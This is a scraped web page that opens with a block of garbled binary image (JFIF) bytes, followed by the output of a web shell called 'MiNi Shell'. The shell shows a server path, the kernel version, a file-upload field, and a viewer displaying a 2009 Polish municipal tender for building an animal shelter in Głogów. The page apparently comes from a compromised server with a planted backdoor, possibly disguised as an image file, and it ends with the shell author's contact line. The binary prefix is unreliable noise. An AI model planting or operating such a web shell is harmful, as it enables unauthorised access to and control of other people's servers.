JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090723/250962-N-2009.html

<p class="kh_header"><b>Głogów: Budowa schroniska dla zwierząt na działce                           o nr geodezyjnym 108/12 i 108/13 w obrębie 16 Huta w Głogowie.</b><br>
<b>Numer ogłoszenia: 250962 - 2009; data zamieszczenia: 23.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa schroniska dla zwierząt na działce                           o nr geodezyjnym 108/12 i 108/13 w obrębie 16 Huta w Głogowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Branża budowlana:
I.	Budynek nr 1:
1.	Roboty rozbiórkowe
-	wykucie ościeżnic drzwiowych i okiennych z muru,
-	wykucie strzępi w płaszczyźnie ściany,
-	rozbiórka ścianek z cegły,
-	zerwanie posadzek z PCV,
-	obicie tynków wewnętrznych,
-	demontaż zadaszenia.
2.	Roboty murowe:
-	ścianki działowe z betonu komórkowego gr. 12 cm,
-	ścianki działowe z betonu komórkowego gr. 6 cm,
-	ścianki działowe z betonu komórkowego gr. 24 cm,
-	zamurowanie otworów,
-	montaż nadproży prefabrykowanych,
-	obsadzenie podokienników PCV,
-	stolarka drzwiowa i okienna,
-	montaż ościeżnic stalowych,
-	montaż skrzydeł drzwiowych,
-	montaż okien PCV,
-	montaż nawietrzaków podokiennych typ A.
3.	Posadzki:
-	izolacje cieplne i przeciwwilgociowe z płyt styropianowych,
-	izolacje przeciwwilgociowe z folii polietylenowej,
-	warstwy wyrównawcze pod posadzki,
-	posadzki z płytek kamionkowych gres z cokolikiem.
4.	Sufity podwieszone, tynki i malowanie:
-	sufit podwieszony na ruszcie metalowym,
-	izolacja z folii paroizolacyjnej,
-	izolacja z wełny mineralnej 18 cm,
-	izolacja z folii paroprzepuszczalnej,
-	przecieranie istniejących tynków wewnętrznych ze skrobaniem,
-	gładzie gipsowe na ścianach i sufit5ach,
-	dwukrotne malowanie farbami powierzchni wewnętrznych z gruntowaniem,
-	licowanie ścian płytkami z kamieni sztucznych na zaprawie klejowej.
5.	Remont dachu:
-	więźba dachowa pod pokrycie z blachy nad wejściem,
-	pokrycie więźby blachą trapezową,
-	naprawa pokrycia papowego,
-	obróbki blacharskie z blachy powlekanej,
-	montaż rynien i rur spustowych.
2.	Elewacja:
-	uzupełnienie tynków zewnętrznych,
-	przygotowanie starego podłoża pod docieplenie metodą lekką - mokrą z gruntowaniem,
-	docieplenie ścian płytami styropianowymi gr. 12 cm z wyprawą akrylową,
-	okładziny schodów płytkami kamionkowymi,
-	montaż balustrad schodowych,
-	obróbki blacharskie z blachy powlekanej.
3.	Roboty zewnętrzne:
-	rozbiórka elementów betonowych,
-	obrzeża betonowe na podsypce piaskowej,
-	opaska z kostki betonowej.
4.	Pozostałe roboty:
-	wywóz gruzu samochodami ze składowaniem na wysypisku.
II.	Budynek nr 2:
-	zakres robót jak na budynku nr 1 zwiększony o remont rampy, schodów i podjazdu.
III.	Budynek nr 3:
-	zakres robót jak na budynku nr 1 zwiększony o remont rampy, schodów,  podjazdu i nowego wybiegu dla psów.
IV.	Budynek nr 4:
-	zakres robót jak na budynku nr 1 zwiększony o remont rampy, schodów,  podjazdu i nowego wybiegu dla psów.
V.	Budynek nr 5 - kojce dla psów:
-	wykopy pod fundamenty w gruncie,
-	stopy fundamentowe betonowe,
-	montaż konstrukcji stalowej typ lekki,
-	pokrycie dachu blacha trapezową,
-	podkład betonowy pod posadzki ze spadkami,
-	nawierzchnia z mieszanki mineralno - bitumicznej gr. 3 cm,
-	opaska wokół kojców,
-	montaż elementów kojców dla psów typu B, C, E, F, G, H,
-	malowanie farbami konstrukcji metalowych,
-	wywiezienie gruzu samochodami na wysypisko.
VI.	Budynek nr 6:
-	zakres robót jak w obiekcie nr 5 zwiększony o ogrodzenie z prefabrykowanych elementów betonowych i furtki z siatki w ramie stalowej.
VII.	Budynek nr 7 - garaż:
-	wykopy pod budynek,
-	podkład betonowy,
-	ławy fundamentowe żelbetowe,
-	fundamenty z bloczków betonowych,
-	izolacje przeciwwilgociowe,
-	ściany z bloczków z betonu komórkowego gr. 24 cm i wieńce,
-	tynki wewnętrzne i zewnętrzne,
-	konstrukcja drewniana dachu,
-	izolacja z folii paroprzepuszczalnej,
-	pokrycie dachu blachą trapezową,
-	montaż rynien z rur stalowych,
-	obsadzenie bramy uchylnej,
-	podkład betonowy na podłożu gruntowym,
-	izolacja z folii,
-	posadzka betonowa gr. 5 cm,
-	sufit z płyt gipsowo - kartonowych na ruszcie metalowym,
-	wywietrzak dachowy,
-	opaska z kostki betonowej.
VIII.	Woliera na ptaki:
-	wykopy pod ławy krawężnikowe,
-	wykonanie ław betonowych i montaż krawężników betonowych,
-	montaż elementów kojców dla psów typu F, G, I, J,
-	montaż podłogi drewnianej w kojcach,
-	montaż dachu z blachy powlekanej.
Branża drogowa:
I.	Droga Dojazdowa:
1.	Powierzchnia - 140,00 m2
2.	Konstrukcja:
-	warstwa odsączająca z piasku, gr. 10 cm,
-	warstwa dolna podbudowy z kruszyw łamanych, gr. 15 cm,
-	warstwa górna podbudowy z kruszyw łamanych, gr. 10 cm,
-	nawierzchnia z kostki betonowej gr. 8 cm na podsypce cementowo - piaskowej, spoiny wypełnione piaskiem.
3.	Obramowanie - 63,20 m
i.	krawężniki betonowe 15x30 wystające na ławie betonowej i podsypce cementowo - piaskowej.
II.	Chodnik:
1.	Powierzchnia - 30,00 m2
2.	Konstrukcja:
-	warstwa odsączająca z piasku, gr. 10 cm,
-	nawierzchnia z kostki betonowej gr. 6 cm na podsypce cementowo - piaskowej z wypełnieniem spoin piaskiem.
3.	Obramowanie - 8,76 m
-	obrzeża betonowe 20x6 na podsypce piaskowej z wypełnieniem spoin piaskiem.
III.	Parking:
1.	Powierzchnia - 54,00 m2
2.	Konstrukcja:
-	warstwa odsączająca z piasku, gr. 10 cm,
-	warstwa dolna podbudowy z kruszyw łamanych, gr. 15 cm,
-	warstwa górna podbudowy z kruszyw łamanych, gr. 10 cm,
-	nawierzchnia z kostki betonowej gr. 8 cm na podsypce cementowo - piaskowej, spoiny wypełnione piaskiem.
3.	Obramowanie - 21,00 m
-	krawężniki betonowe 15x30, wystające na ławie betonowej i podsypce cementowo - piaskowej.
IV.	Nawierzchnia placu:
1.	Powierzchnia - 1274,00 m2
2.	Konstrukcja: 
-	ręczne wykonanie warstwy wyrównawczej z mieszanki mineralno - asfaltowej - 31,85 t,
-	warstwa ścieralna z mieszanki mineralno - bitumicznej grysowo - żwirowej gr. 4 cm.
3.	Mechaniczne czyszczenie studzienek chłonnych - 2 szt.
4.	Regulacja pionowa studzienek dla włazów kanałowych - 2 szt.
5.	Studzienki ściekowe z gotowych elementów, betonowe O 500 mm bez osadnika i syfonu - 2 szt.
6.	Kanały z rur PVC O 160 mm - 2,00 m.
Branża sanitarna:
1.	Kanalizacja sanitarna:
-	rurociąg z rur PVC O 160 mm,
-	studnie rewizyjne system. typu Wavin O 425mm i O 600mm,
-	zbiorniki na ścieki PE-HD o pojemności 10,0 m3 - 4 szt.,
-	separator tłuszczu.
2. Sieć wodociągowa:
-	rurociąg z rur PE-HD O 110 mm,
-	rurociąg z rur PE-HD O 90 mm,
-	hydranty przeciwpożarowe podziemne.
  	3. Wewnętrzne instalacje wodno - kanalizacyjne:
-	w budynku nr 1 z kojcami dla psów,
-	w budynku nr 2 z kojcami dla psów,
-	w budynku kwarantanny dla zwierząt z kojcami wolnostojącymi,
-	w budynku socjalnym,
-	w budynku kuchni.
Branża elektryczna : 
1.  Układanie kabli zasilających i oświetleniowych  (rurach osłonowych )     -   750 mb
2.  Układanie kabli  gniazd siłowych i wtykowych                                          -   780 mb
3.  Montaż rozdzielnic                                                                                       -   6 szt.
4.  Montaż instalacji ochrony odgromowej                                                       -   1  kpl.
                                      - bednarka                                                                    -   73 kg
                                      - drut                                                                            -  103 kg
5.  Montaż instalacji ochrony przeciwporażeniowej                                         -  1 kpl.
                                      - bednarka                                                                    -  14 kg
                                      - linka miedziana 16 mm                                             -  10 kg
6.  Montaż opraw oświetleniowych    - zgodnie z projektem                            -   78 szt.
7.  Montaż gniazd wtykowych                                                                           -   74 szt.
8.  Montaż łączników instalacyjnych                                                                 -   43 szt.
9.  Montaż  podgrzewaczy elektrycznych                                                          -  2 szt.
10.  Montaż grzejników elektrycznych                                                              -  18 szt.
11. Montaż bojlera                                                                                             -  1 szt.
12. Montaż parownika                                                                                       -  1 szt.
13. Wykonanie pomiarów kontrolnych i odbiorczych                                      -  2  kpl.                                                                  

Szczegółowy zakres prac oraz ich ilość określa dokumentacja projektowa..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 30000,- zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	Spełniają wymogi art. 22 ust. 1 ustawy pzp
2)	Nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy pzp
3)	Wykonali w okresie pięciu lat roboty budowlane, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, odpowiadające swym rodzajem robotom budowlanym stanowiącym przedmiot zamówienia.                                             Zamawiający za robotę podobną uzna  roboty polegające na budowie / przebudowie/ rozbudowie  budynku wraz z przyłączami o kubaturze nie mniejszej jak 1.500 m 3 oraz budowie / przebudowie drogi wraz z odwodnieniem  o dł. nie mniejszej jak  100 mb.
4)	dysponują lub będą dysponować, osobami  posiadającymi uprawnienia  do:
-	kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej                 w zakresie niezbędnym do wykonania zamówienia,
-	kierowania robotami  budowlanymi  w specjalności instalacyjnej w zakresie sieci i instalacji sanitarnych w zakresie niezbędnym do wykonania zamówienia,
-	kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych w zakresie niezbędnym do wykonania zamówienia, 
-	kierowania robotami budowlanymi w specjalności drogowej w zakresie niezbędnym do wykonania zamówienia,
      posiadającymi aktualne zaświadczenie o przynależności do OIIB,
5)  Posiadają środki finansowe w wysokości co najmniej  500.000,00 zł lub zdolność  
      kredytową w wysokości co najmniej 500.000,00 zł .
6) Posiadają ubezpieczenie działalności od OC w zakresie prowadzonej działalności  
     gospodarczej.
Zamawiający dokona oceny spełnienia warunków na podstawie oświadczeń i dokumentów na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.   Formularza ofertowego - zał. Nr 1 do SIWZ.
   2.   Protokółu z wizji terenu objętego zamówieniem potwierdzony przez inspektora  
         nadzoru Zamawiającego.
3.	Kosztorysu ofertowego opracowanego metodą szczegółową   
4.	Harmonogramu rzeczowo - finansowych w układzie miesięcznym   
Na etapie zawierania umowy Zamawiający zastrzega sobie możliwość dokonania aktualizacji harmonogramu rzeczowo - finansowego.
    
Uwaga !
Podane przy poszczególnych pozycjach przedmiaru numery katalogów mają jedynie charakter informacyjny.
Wykonawca ma prawo stosować przy wycenie poszczególnych pozycji przedmiaru
kalkulację własną.
5.	Dowodu wniesienia  wadium.
6.	Aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Zaświadczenie o wpisie do ewidencji działalności gospodarczej musi posiadać adnotację właściwego organu wydającego to zaświadczenie o aktualności zapisów - dokonaną w terminie jak wyżej.
7.	Pełnomocnictwo udzielone jednemu z partnerów, przez pozostałych wykonawców, do reprezentowania ich w przedmiotowym postępowaniu albo reprezentowaniu                            w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku wykonawców wspólnie ubiegających się o niniejsze zamówienie.
8.	Oświadczenia o spełnieniu warunków udziału w postępowaniu w trybie art.22 pzp -   zał. Nr 2 do SIWZ,
9.	Dokumentów stwierdzających, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, - zgodnie z załącznikiem Nr 4 do SIWZ 
10.	Aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego  oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzające odpowiednio, że  wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na  raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
11.	Informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebność personelu kierowniczego w okresie ostatnich 3-ch lat, a w przypadku gdy okres      prowadzenia działalności jest krótszy - w tym okresie - zał. Nr 4 do SIWZ.
12.	Wykazu osób lub pisemne zobowiązanie innych podmiotów do udostępnienia osób        zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby        którymi będzie dysponował i które  będą uczestniczyć w wykonywaniu zamówienia         wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia                                i  wykształcenia niezbędnych  do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - zał. Nr 4 do SIWZ, 
13.	Informacja nt. części zamówienia jakie wykonawca zamierza powierzyć  podwykonawcom- zał. Nr 5 do SIWZ.
14.	 Wykazu wykonanych robót budowlanych  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,- zał. Nr 3 do SIWZ,
15.	Informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym  wykonawca posiada rachunek, potwierdzający wysokość  posiadanych środków  finansowych w wysokości co najmniej 500.000,00 zł. lub zdolność kredytową      wykonawcy na kwotę co najmniej  500.000,00 zł. wystawiona  nie wcześniej  niż      3  miesiące przed upływem terminu składania ofert,
16.	Polisy, a w przypadku jej braku innego dokumentu  potwierdzającego,                              że  wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Rynek 10 67-200 Głogów pok.314.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2009 godzina 09:00, miejsce: Urząd Miejski Rynek 10 67-200 Głogów pok.125 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com